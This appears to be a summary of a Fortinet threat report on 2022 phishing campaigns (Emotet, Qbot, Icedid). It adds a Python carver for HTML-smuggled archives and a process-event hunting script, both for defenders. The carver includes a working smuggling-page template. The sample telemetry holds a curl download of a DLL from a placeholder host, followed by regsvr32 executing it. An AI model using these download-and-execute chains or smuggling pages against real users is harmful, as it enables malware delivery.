Fortinet FortiGuard Labs analyzes phishing-driven malware campaigns in Q3 2022, highlighting the use of HTML Smuggling, Excel 4.0 macros, Word VBA macros, and ISO image delivery to drop Emotet, Qbot, and Icedid. The report details multiple delivery chains and IOCs, and outlines Fortinet protections and user-awareness approaches to mitigate these threats. hashtags: #Emotet #Qbot #Icedid #HTMLSmuggling #ISOFiles
Keypoints
- Phishing emails remain the primary infection vector, often delivering malicious attachments or links to download malware.
- HTML Smuggling is used to get past mail and web filtering: the attachment is an HTML page whose embedded script decodes and writes out a password-protected ZIP on the victim's device, so the archive is never transferred as a scannable file.
- Emotet campaigns in Q3 2022 reuse Excel 4.0 macros to download and execute payloads.
- A Word document with VBA macros drops an Icedid DLL and shows a decoy security prompt to entice the user into enabling content (macros).
- ISO files are a popular container for delivering Qbot and Icedid, employing LNK, BAT, JS, and CHM/script-based execution chains.
- Fortinet protections (CDR, FortiEDR, FortiMail, antivirus signatures, and security-awareness training) mitigate these threats, and a set of IOCs is provided for detection.
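As an added example (not code from the Fortinet report), the following Python script shows what the HTML Smuggling step described above looks like to an analyst: it flags the JavaScript idioms such pages rely on (`atob`, `Blob`, `createObjectURL`, a synthetic `.download`/`.click()`), carves every long base64 run out of the page, classifies the decoded bytes by magic number (ZIP, ISO 9660, PE, PDF), and reads the encryption bit from a ZIP's central directory, which is visible without the password and is exactly the property that defeats content scanners. The sample HTML and ZIP are constructed in the script; the `build_sample_zip(mark_encrypted=True)` helper flips the flag by hand because `zipfile` cannot write encrypted archives. Campaigns that split, reverse or XOR the blob before decoding will not be carved by the plain base64 pass and need the decoder emulated.

```python
import base64
import io
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# JavaScript idioms HTML-smuggling pages use to turn an inline blob into a
# client-side download. Several of these together is a strong signal.
SMUGGLING_MARKERS = ("atob(", "new Blob(", "createObjectURL(",
                     "msSaveOrOpenBlob(", ".download", ".click(")

B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
DOWNLOAD_NAME_RE = re.compile(r"""\.download\s*=\s*['"]([^'"]+)['"]""")


@dataclass
class SmuggledFile:
    download_name: Optional[str]   # name the page assigns to the download, if any
    kind: str                      # container type by magic bytes
    size: int
    zip_encrypted: Optional[bool]  # only meaningful for kind == "zip"


def identify(data: bytes) -> str:
    """Classify a decoded blob by magic bytes (ZIP / ISO 9660 / PE / PDF)."""
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[:2] == b"MZ":
        return "pe"
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "iso9660"
    if data[:4] == b"%PDF":
        return "pdf"
    return "unknown"


def zip_has_encrypted_entry(data: bytes) -> bool:
    """Bit 0 of the general-purpose flag marks an encrypted member; it is
    readable from the central directory without knowing the password."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(info.flag_bits & 0x1 for info in zf.infolist())


def smuggling_markers(html: str) -> List[str]:
    """Which of the smuggling idioms the page contains."""
    return [m for m in SMUGGLING_MARKERS if m in html]


def carve_smuggled_files(html: str) -> List[SmuggledFile]:
    """Decode every long base64 run in the page and keep the ones that are a
    recognisable file container."""
    m = DOWNLOAD_NAME_RE.search(html)
    download_name = m.group(1) if m else None
    found: List[SmuggledFile] = []
    for run in B64_RE.finditer(html):
        try:
            data = base64.b64decode(run.group(0), validate=True)
        except ValueError:
            continue  # not valid base64 (e.g. a long identifier)
        kind = identify(data)
        if kind == "unknown":
            continue
        encrypted = zip_has_encrypted_entry(data) if kind == "zip" else None
        found.append(SmuggledFile(download_name, kind, len(data), encrypted))
    return found


# --- constructed sample, not a campaign artifact ---------------------------
def build_sample_zip(mark_encrypted: bool = False) -> bytes:
    """Tiny ZIP with one member; optionally set the encryption flag in the
    central directory to mimic a password-protected archive's header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.iso", b"placeholder, not a real disc image")
    data = bytearray(buf.getvalue())
    if mark_encrypted:
        cd = data.index(b"PK\x01\x02")  # central directory file header
        data[cd + 8] |= 0x01            # general-purpose flag, bit 0
    return bytes(data)


def build_sample_html(payload: bytes) -> str:
    """Minimal smuggling page: base64 blob decoded with atob, wrapped in a
    Blob and clicked as a download named invoice.zip."""
    b64 = base64.b64encode(payload).decode()
    return (
        "<html><body><script>\n"
        "var d = atob('" + b64 + "');\n"
        "var a = new Uint8Array(d.length);\n"
        "for (var i = 0; i < d.length; i++) a[i] = d.charCodeAt(i);\n"
        "var blob = new Blob([a], {type: 'application/octet-stream'});\n"
        "var link = document.createElement('a');\n"
        "link.href = URL.createObjectURL(blob);\n"
        "link.download = 'invoice.zip';\n"
        "link.click();\n"
        "</script></body></html>\n"
    )


if __name__ == "__main__":
    page = build_sample_html(build_sample_zip(mark_encrypted=True))
    print("markers:", smuggling_markers(page))
    for f in carve_smuggled_files(page):
        print(f)
```

Run against a real attachment with `carve_smuggled_files(open(path).read())`; a hit whose `kind` is `zip` with `zip_encrypted` set is the pattern this report describes, and the carved bytes can then be handed to a sandbox or hashed against the IOC list.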
MITRE Techniques
- [T1566.001] Phishing – Attachment – “phishing emails… include a malicious file attachment…”
- [T1566.002] Phishing – Link – “a malicious site that downloads a malicious file.”
- [T1027] Obfuscated Files and Information – “obfuscated scripts” used to hide the execution steps in the Qbot chain.
- [T1059] Command and Scripting Interpreter – Excel 4.0 (XLM) macros used to download and execute payloads (Excel macro as downloader); the older T1064 Scripting ID is deprecated in favour of T1059.
- [T1059.005] Visual Basic – Word VBA macros dropping an Icedid DLL (Word document with VBA macros).
- [T1218.011] System Binary Proxy Execution: Rundll32 – “rundll32.exe” is called to load the malicious DLL file.
- [T1218.010] System Binary Proxy Execution: Regsvr32 – “regsvr32.exe 102755.dll” loads the malicious DLL (Regsvr32 is sub-technique .010; .012 is Verclsid).
- [T1574.001] DLL Search Order Hijacking – a DLL placed in the ISO/container directory is resolved ahead of the legitimate copy in the Windows directory.
- [T1059.003] Windows Command Shell – a batch file runs “curl.exe” to download the malware DLL and then executes it with subsequent commands (the download step itself is T1105 Ingress Tool Transfer).
- [T1204.002] User Execution: Malicious File – LNK file execution leading to BAT/JS/TXT workflows to run the DLL.
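The technique list above describes two execution chains that are visible in process-creation telemetry: the ISO/LNK route (explorer.exe launches a BAT or JS through a script host, which fetches a DLL with curl.exe and registers it with regsvr32.exe/rundll32.exe), and the macro route (Excel/Word spawning a proxy binary directly, as in the “regsvr32.exe 102755.dll” IOC, where the DLL is given by a bare relative name). The following Python script is an added example, not part of the Fortinet report: it evaluates those chains over a small set of constructed Sysmon-style process events (pids, paths and the `example.invalid` URL are made up) and labels each hit with the ATT&CK ID used in the list. The rules are hunting heuristics, not a vendor's detection content: a proxy binary given a DLL that is relative or outside System32/SysWOW64, curl.exe writing a `.dll`/`.exe`, an Office parent spawning a proxy binary or script host, and the explorer → script host → proxy binary ancestry.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Directories from which regsvr32/rundll32 normally load their DLL argument.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PROXY_BINARIES = {"regsvr32.exe": "T1218.010", "rundll32.exe": "T1218.011"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
OFFICE_APPS = {"excel.exe", "winword.exe"}
DLL_ARG_RE = re.compile(r'"?([^"\s]+\.dll)"?', re.I)
CURL_OUT_RE = re.compile(r'(?:^|\s)(?:-o|--output)\s+"?([^"\s]+\.(?:dll|exe))', re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


@dataclass
class Alert:
    pid: int
    technique: str
    reason: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image basenames from the process up to the root, child first."""
    chain: List[str] = []
    cur: Optional[ProcEvent] = ev
    while cur is not None and len(chain) < 16:
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def dll_outside_system(cmdline: str) -> Optional[str]:
    """Return the DLL argument if it is relative or outside System32/SysWOW64."""
    for m in DLL_ARG_RE.finditer(cmdline):
        dll = m.group(1)
        if not dll.lower().startswith(SYSTEM_DIRS):
            return dll
    return None


def analyze(events: List[ProcEvent]) -> List[Alert]:
    by_pid = {e.pid: e for e in events}
    alerts: List[Alert] = []
    for ev in events:
        name = basename(ev.image)
        chain = ancestry(ev, by_pid)
        parent = chain[1] if len(chain) > 1 else ""
        if name in PROXY_BINARIES:
            dll = dll_outside_system(ev.cmdline)
            if dll:
                alerts.append(Alert(ev.pid, PROXY_BINARIES[name],
                                    f"{name} loads {dll} from outside the Windows "
                                    f"directory; chain {' <- '.join(chain)}"))
        if name == "curl.exe":
            m = CURL_OUT_RE.search(ev.cmdline)
            if m:
                alerts.append(Alert(ev.pid, "T1105",
                                    f"curl.exe writes executable content to {m.group(1)}"))
        if parent in OFFICE_APPS and (name in PROXY_BINARIES or name in SCRIPT_HOSTS):
            alerts.append(Alert(ev.pid, "T1204.002",
                                f"{parent} spawned {name} (macro enabled by the user)"))
        if parent in SCRIPT_HOSTS and name in PROXY_BINARIES and chain[2:3] == ["explorer.exe"]:
            alerts.append(Alert(ev.pid, "T1204.002",
                                "explorer -> script host -> proxy binary (LNK/BAT/JS launcher)"))
    return alerts


# Constructed sample telemetry; pids, paths and the URL are invented.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # ISO chain: LNK on the mounted image runs a BAT via cmd.exe
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "D:\document\start.bat"'),
    ProcEvent(201, 200, r"C:\Windows\System32\curl.exe",
              r"curl.exe -s -o C:\ProgramData\xxx.dll http://example.invalid/x"),
    ProcEvent(202, 200, r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe C:\ProgramData\xxx.dll"),
    # Macro chain: Excel registers a DLL by bare relative name
    ProcEvent(300, 100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "EXCEL.EXE"),
    ProcEvent(301, 300, r"C:\Windows\SysWOW64\regsvr32.exe", r"C:\Windows\SysWOW64\regsvr32.exe 102755.dll"),
    # Benign: Control Panel applet loaded from System32, and a plain dir listing
    ProcEvent(400, 100, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcEvent(500, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(a.pid, a.technique, a.reason)
```

The relative-name case (“102755.dll”) is the one worth keeping in mind when tuning: a bare DLL name means regsvr32 resolves it from the working directory, which for a document-spawned process is wherever the lure was opened, so it should never be whitelisted by path.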
Indicators of Compromise
- [SHA256] Malicious sample (SHA256) – ca15f68eb58e61313dda1d34c4d20f1582b8506481436c1bfd5c354922ddf7e0, 84e281b7755da1f89e3ed2b109556002c40547292deed3f7a7754707c69396fd, and 6 more hashes
- [SHA256] Malware payload (SHA256) – 84197619db6a80282ae8d96e40e107de9596a020cd9397f780c07fab3c4576d7, 2c87388d5f2eba48cd479c05c837a5e4a661927fc0ade00b986489a449ad0e3c, and 5 more hashes
- [File names] DLLs and executables dropped/executed by these campaigns – e.g., xxx.dll, 102755.dll, app.dll, WindowsCodecs.dll
- [File path] Example drop locations and loader command lines – C:\ProgramData\xxx.dll; C:\Windows\SysWOW64\regsvr32.exe 102755.dll
Read more: https://www.fortinet.com/blog/threat-research/delivery-of-malware-phishing-campaigns-in-q3-2022